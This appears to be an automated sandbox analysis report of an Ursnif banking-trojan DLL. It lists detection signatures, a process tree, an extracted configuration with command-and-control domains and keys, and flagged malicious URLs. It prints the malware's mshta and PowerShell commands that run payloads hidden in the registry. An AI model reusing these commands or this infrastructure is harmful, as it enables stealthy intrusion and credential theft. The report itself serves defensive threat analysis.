Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report data.dll

Overview

General Information

Sample Name:data.dll
Analysis ID:498359
MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\data.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1848 cmdline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4868 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6508 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4500 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1444 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 6988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 3980 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4812 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5528 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5008 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 1424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 3512 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 1260 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • mshta.exe (PID: 6692 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3740 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2088 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
        00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 98 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.loaddll32.exe.10d8cd6.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.dd0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.5d0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.30a94a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    5.3.rundll32.exe.4f694a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 19 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', ProcessId: 6836
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3980
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132780367479355110.4588.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KTAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0icAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lbKAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/Avira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2BAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLyAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/lAvira URL Cloud: Label: malware
                      Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/iAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: data.dllVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: art.microsoftsofymicrosoftsoft.atVirustotal: Detection: 10%Perma Link
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00DD3FAB
                      Source: data.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: data.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
